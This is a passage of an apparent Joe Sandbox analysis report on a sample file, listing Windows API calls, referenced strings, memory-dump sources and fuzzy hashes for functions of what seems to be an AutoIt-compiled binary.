                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: HandleLoadModuleString__swprintf$Message_wprintf
                                                                        • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                        • API String ID: 618562835-2268648507
                                                                        • Opcode ID: a59208affc3aa2bb08db6226f6c62a396e4811b9464aafc90afd6222fd3e87a0
                                                                        • Instruction ID: 8de3cf4989358254c366d4b0806a8de475e650f2e27fec461c984655c4a189d8
                                                                        • Opcode Fuzzy Hash: a59208affc3aa2bb08db6226f6c62a396e4811b9464aafc90afd6222fd3e87a0
                                                                        • Instruction Fuzzy Hash: 3E413B7280021DAACB14FBE4DE86EFEB778FF55344F100065B601B6092EA206F49DBA1
                                                                        APIs
                                                                        • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0093D0D8
                                                                        • __swprintf.LIBCMT ref: 0093D0FA
                                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 0093D137
                                                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0093D15C
                                                                        • _memset.LIBCMT ref: 0093D17B
                                                                        • _wcsncpy.LIBCMT ref: 0093D1B7
                                                                        • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0093D1EC
                                                                        • CloseHandle.KERNEL32(00000000), ref: 0093D1F7
                                                                        • RemoveDirectoryW.KERNEL32(?), ref: 0093D200
                                                                        • CloseHandle.KERNEL32(00000000), ref: 0093D20A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                        • String ID: :$\$\??\%s
                                                                        • API String ID: 2733774712-3457252023
                                                                        • Opcode ID: fd5be6c4c450dd146fa568e9ade9e3a42ad2d1815ce879078048552a18d6e923
                                                                        • Instruction ID: c4126064c7bb1bfa0a6e55980d043c13062c920219130d00b15e8fb20da767ae
                                                                        • Opcode Fuzzy Hash: fd5be6c4c450dd146fa568e9ade9e3a42ad2d1815ce879078048552a18d6e923
                                                                        • Instruction Fuzzy Hash: BF31AFB2A14109ABDB21DFA0DC49FEB37BDEF89700F1040B6F519D21A1E77096858F64
                                                                        APIs
                                                                        • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,0095BEF4,?,?), ref: 0095E754
                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0095BEF4,?,?,00000000,?), ref: 0095E76B
                                                                        • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,0095BEF4,?,?,00000000,?), ref: 0095E776
                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,0095BEF4,?,?,00000000,?), ref: 0095E783
                                                                        • GlobalLock.KERNEL32(00000000), ref: 0095E78C
                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,0095BEF4,?,?,00000000,?), ref: 0095E79B
                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 0095E7A4
                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,0095BEF4,?,?,00000000,?), ref: 0095E7AB
                                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,0095BEF4,?,?,00000000,?), ref: 0095E7BC
                                                                        • OleLoadPicture.OLEAUT32(?,00000000,00000000,0097D9BC,?), ref: 0095E7D5
                                                                        • GlobalFree.KERNEL32(00000000), ref: 0095E7E5
                                                                        • GetObjectW.GDI32(00000000,00000018,?), ref: 0095E809
                                                                        • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 0095E834
                                                                        • DeleteObject.GDI32(00000000), ref: 0095E85C
                                                                        • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0095E872
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                        • String ID:
                                                                        • API String ID: 3840717409-0
                                                                        • Opcode ID: aa84ba80f7e29bd7d3beaeae59b18c9dcf60cf2c8056868b69c9e0b159233dbb
                                                                        • Instruction ID: b59aa8376b0b31707bdb8e21f3bd91b1aa6013ce96c3b0b23d18265f2cb4771d
                                                                        • Opcode Fuzzy Hash: aa84ba80f7e29bd7d3beaeae59b18c9dcf60cf2c8056868b69c9e0b159233dbb
                                                                        • Instruction Fuzzy Hash: C8415972601204EFDB15DF65DC88EAA7BB9FF89715F108058F909D7260C7319A85DB60
                                                                        APIs
                                                                        • __wsplitpath.LIBCMT ref: 0094076F
                                                                        • _wcscat.LIBCMT ref: 00940787
                                                                        • _wcscat.LIBCMT ref: 00940799
                                                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 009407AE
                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 009407C2
                                                                        • GetFileAttributesW.KERNEL32(?), ref: 009407DA
                                                                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 009407F4
                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00940806
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                        • String ID: *.*
                                                                        • API String ID: 34673085-438819550
                                                                        • Opcode ID: 7ede1683e17396572432a4d25470c31d7bd50b3a7d91040260f1d37febfc8dee
                                                                        • Instruction ID: df38a8274d1f459392837b19c1cc56996526e0ba73b3b02f7c30883ed16efa2f
                                                                        • Opcode Fuzzy Hash: 7ede1683e17396572432a4d25470c31d7bd50b3a7d91040260f1d37febfc8dee
                                                                        • Instruction Fuzzy Hash: 7681A0715043059FCB24DF24C845D6EB7E8BFC8304F158D2EFA8AC7251EA35D9948B92
                                                                        APIs
                                                                          • Part of subcall function 0090B34E: GetWindowLongW.USER32(?,000000EB), ref: 0090B35F
                                                                        • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0095EF3B
                                                                        • GetFocus.USER32 ref: 0095EF4B
                                                                        • GetDlgCtrlID.USER32(00000000), ref: 0095EF56
                                                                        • _memset.LIBCMT ref: 0095F081
                                                                        • GetMenuItemInfoW.USER32 ref: 0095F0AC
                                                                        • GetMenuItemCount.USER32(00000000), ref: 0095F0CC
                                                                        • GetMenuItemID.USER32(?,00000000), ref: 0095F0DF
                                                                        • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 0095F113
                                                                        • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 0095F15B
                                                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0095F193
                                                                        • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0095F1C8
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                        • String ID: 0
                                                                        • API String ID: 1296962147-4108050209
                                                                        • Opcode ID: bd497b2347cdc09a15dd047a92c2b7ce705b4b77b858052d5f77ecb051d0fd7c
                                                                        • Instruction ID: 98dfd5836104bba5b6605c7b3aa4c547a7b9d1ad6a973830542b773073c33048
                                                                        • Opcode Fuzzy Hash: bd497b2347cdc09a15dd047a92c2b7ce705b4b77b858052d5f77ecb051d0fd7c
                                                                        • Instruction Fuzzy Hash: 32818B71509301EFD720CF16C894A6ABBE9FF88325F10092EFD9897291D731D949CB92
                                                                        APIs
                                                                          • Part of subcall function 0092ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0092ABD7
                                                                          • Part of subcall function 0092ABBB: GetLastError.KERNEL32(?,0092A69F,?,?,?), ref: 0092ABE1
                                                                          • Part of subcall function 0092ABBB: GetProcessHeap.KERNEL32(00000008,?,?,0092A69F,?,?,?), ref: 0092ABF0
                                                                          • Part of subcall function 0092ABBB: HeapAlloc.KERNEL32(00000000,?,0092A69F,?,?,?), ref: 0092ABF7
                                                                          • Part of subcall function 0092ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0092AC0E
                                                                          • Part of subcall function 0092AC56: GetProcessHeap.KERNEL32(00000008,0092A6B5,00000000,00000000,?,0092A6B5,?), ref: 0092AC62
                                                                          • Part of subcall function 0092AC56: HeapAlloc.KERNEL32(00000000,?,0092A6B5,?), ref: 0092AC69
                                                                          • Part of subcall function 0092AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0092A6B5,?), ref: 0092AC7A
                                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0092A8CB
                                                                        • _memset.LIBCMT ref: 0092A8E0
                                                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0092A8FF
                                                                        • GetLengthSid.ADVAPI32(?), ref: 0092A910
                                                                        • GetAce.ADVAPI32(?,00000000,?), ref: 0092A94D
                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0092A969
                                                                        • GetLengthSid.ADVAPI32(?), ref: 0092A986
                                                                        • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0092A995
                                                                        • HeapAlloc.KERNEL32(00000000), ref: 0092A99C
                                                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0092A9BD
                                                                        • CopySid.ADVAPI32(00000000), ref: 0092A9C4
                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0092A9F5
                                                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0092AA1B
                                                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0092AA2F
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                        • String ID:
                                                                        • API String ID: 3996160137-0
                                                                        • Opcode ID: 2140b9088ad302afad4be9d4a33c1851c43510c67500f272a1e57205d9606ef2
                                                                        • Instruction ID: 89075f12c4a1a79f3a52dfdd4e28c599dde92ebd9f96cff56acdd1f8c0d84cc8
                                                                        • Opcode Fuzzy Hash: 2140b9088ad302afad4be9d4a33c1851c43510c67500f272a1e57205d9606ef2
                                                                        • Instruction Fuzzy Hash: 3F519F72901219AFDF00DFA0EC84EEEBBBAFF44310F048129F915A7290DB319A45DB61
                                                                        APIs
                                                                        • GetDC.USER32(00000000), ref: 00949E36
                                                                        • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00949E42
                                                                        • CreateCompatibleDC.GDI32(?), ref: 00949E4E
                                                                        • SelectObject.GDI32(00000000,?), ref: 00949E5B
                                                                        • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00949EAF
                                                                        • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 00949EEB
                                                                        • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00949F0F
                                                                        • SelectObject.GDI32(00000006,?), ref: 00949F17
                                                                        • DeleteObject.GDI32(?), ref: 00949F20
                                                                        • DeleteDC.GDI32(00000006), ref: 00949F27
                                                                        • ReleaseDC.USER32(00000000,?), ref: 00949F32
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                        • String ID: (
                                                                        • API String ID: 2598888154-3887548279
                                                                        • Opcode ID: 4ef508969eba75ae6618a745e6b5d2843830913d24931a6868e8c9c5dd69e815
                                                                        • Instruction ID: 6b32f0e9ca6a2c9a2d06fbd8a255722127df6b0510e7799cc93d3414e0d32aa2
                                                                        • Opcode Fuzzy Hash: 4ef508969eba75ae6618a745e6b5d2843830913d24931a6868e8c9c5dd69e815
                                                                        • Instruction Fuzzy Hash: 7F512776904309EFCB24CFA8C885EAFBBB9EF48710F14881DF959A7250D735A941CB90
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: LoadString__swprintf_wprintf
                                                                        • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                        • API String ID: 2889450990-2391861430
                                                                        • Opcode ID: 13e1569234e53033f3935e5b01687c600eac3e89de8b06e25cb104c9ac063d10
                                                                        • Instruction ID: 0dfeda9b3d14d9c337cb04f6945465d98d7877b5e2e4e565515e8d0cc80c7c62
                                                                        • Opcode Fuzzy Hash: 13e1569234e53033f3935e5b01687c600eac3e89de8b06e25cb104c9ac063d10
                                                                        • Instruction Fuzzy Hash: BD51497190050DAACB15EBA4CE46EEEB778EF04304F104165F605B21A2EB316F99DF61
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: LoadString__swprintf_wprintf
                                                                        • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                        • API String ID: 2889450990-3420473620
                                                                        • Opcode ID: bdee14b5587c5ca1f009f23fecf7cb6ddeecfbbaee8f96e14b08d8cbb3eeca92
                                                                        • Instruction ID: 7f9bb2919e6c769d3d01befb7f157dbb08d609e3245c21fa7fd159b4f190968c
                                                                        • Opcode Fuzzy Hash: bdee14b5587c5ca1f009f23fecf7cb6ddeecfbbaee8f96e14b08d8cbb3eeca92
                                                                        • Instruction Fuzzy Hash: 1C516B7190060DAACB15FBA4CE42EEEB778FF04344F104165B605B20A2EB746F99DF62
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 009355D7
                                                                        • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00935664
                                                                        • GetMenuItemCount.USER32(009B1708), ref: 009356ED
                                                                        • DeleteMenu.USER32(009B1708,00000005,00000000,000000F5,?,?), ref: 0093577D
                                                                        • DeleteMenu.USER32(009B1708,00000004,00000000), ref: 00935785
                                                                        • DeleteMenu.USER32(009B1708,00000006,00000000), ref: 0093578D
                                                                        • DeleteMenu.USER32(009B1708,00000003,00000000), ref: 00935795
                                                                        • GetMenuItemCount.USER32(009B1708), ref: 0093579D
                                                                        • SetMenuItemInfoW.USER32(009B1708,00000004,00000000,00000030), ref: 009357D3
                                                                        • GetCursorPos.USER32(?), ref: 009357DD
                                                                        • SetForegroundWindow.USER32(00000000), ref: 009357E6
                                                                        • TrackPopupMenuEx.USER32(009B1708,00000000,?,00000000,00000000,00000000), ref: 009357F9
                                                                        • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00935805
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                        • String ID:
                                                                        • API String ID: 3993528054-0
                                                                        • Opcode ID: 7a40ffbd5ea7c157b81475086ccf2e55ffb108c7377e8bcc847a2abe386dd8eb
                                                                        • Instruction ID: 7f5f4078d5e05df114dfd018a556eb7bf62a191cd1b8020be99df9beac2c0953
                                                                        • Opcode Fuzzy Hash: 7a40ffbd5ea7c157b81475086ccf2e55ffb108c7377e8bcc847a2abe386dd8eb
                                                                        • Instruction Fuzzy Hash: CB710571645A05BFEB209F15CC4AFAABFA9FF48368F250205F519AA1E0C7716C50DF90
                                                                        APIs
                                                                        • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00952BB5,?,?), ref: 00953C1D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: BuffCharUpper
                                                                        • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                        • API String ID: 3964851224-909552448
                                                                        • Opcode ID: c6bad7316a08939e110735477892fc534b43a3d9c51cac6188d5da373b4bb3ca
                                                                        • Instruction ID: 9ef52df405f59070204a850edbc9e6c112991b07ed557dbc14ecbb192fd7530c
                                                                        • Opcode Fuzzy Hash: c6bad7316a08939e110735477892fc534b43a3d9c51cac6188d5da373b4bb3ca
                                                                        • Instruction Fuzzy Hash: AD413E3061024A8BDF14EF15D851AEA33B5AFA2381F109818FC955B2D2EBB19A0ACB50
                                                                        APIs
                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,009636F4,00000010,?,Bad directive syntax error,0098DC00,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 009325D6
                                                                        • LoadStringW.USER32(00000000,?,009636F4,00000010), ref: 009325DD
                                                                        • _wprintf.LIBCMT ref: 00932610
                                                                        • __swprintf.LIBCMT ref: 00932632
                                                                        • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 009326A1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: HandleLoadMessageModuleString__swprintf_wprintf
                                                                        • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                        • API String ID: 1080873982-4153970271
                                                                        • Opcode ID: 3c552f44e69b6120684ae97a7ff0db583f2a5e9d8988f68941e00122bb45501f
                                                                        • Instruction ID: a5808df645d4a13da36c47fae8357dddac92a23e8d5f032ed0ff7d0e808c0628
                                                                        • Opcode Fuzzy Hash: 3c552f44e69b6120684ae97a7ff0db583f2a5e9d8988f68941e00122bb45501f
                                                                        • Instruction Fuzzy Hash: F8214D3290021EBFCF11ABA0CC4AFEE7779FF59308F004455F615A60A2DA71A654DB51
                                                                        APIs
                                                                        • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00937B42
                                                                        • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00937B58
                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00937B69
                                                                        • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00937B7B
                                                                        • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00937B8C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: SendString
                                                                        • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                        • API String ID: 890592661-1007645807
                                                                        • Opcode ID: 6284133c2ead779acb995810a61ae1e27c47e6ccf0ce47a1da0b870e9d9688b5
                                                                        • Instruction ID: f2cf340360f5b657de4e4ae3ddbca49ba6007d9ca17171b3e1cd38ae1aa8e402
                                                                        • Opcode Fuzzy Hash: 6284133c2ead779acb995810a61ae1e27c47e6ccf0ce47a1da0b870e9d9688b5
                                                                        • Instruction Fuzzy Hash: 7211BFE1A5026D79D720B7B9CC8ADFFBABCEBD2B14F0004197511A20C1EA601E44CAE1
                                                                        APIs
                                                                        • timeGetTime.WINMM ref: 00937794
                                                                          • Part of subcall function 0090DC38: timeGetTime.WINMM(?,7707B400,009658AB), ref: 0090DC3C
                                                                        • Sleep.KERNEL32(0000000A), ref: 009377C0
                                                                        • EnumThreadWindows.USER32(?,Function_00047744,00000000), ref: 009377E4
                                                                        • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00937806
                                                                        • SetActiveWindow.USER32 ref: 00937825
                                                                        • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00937833
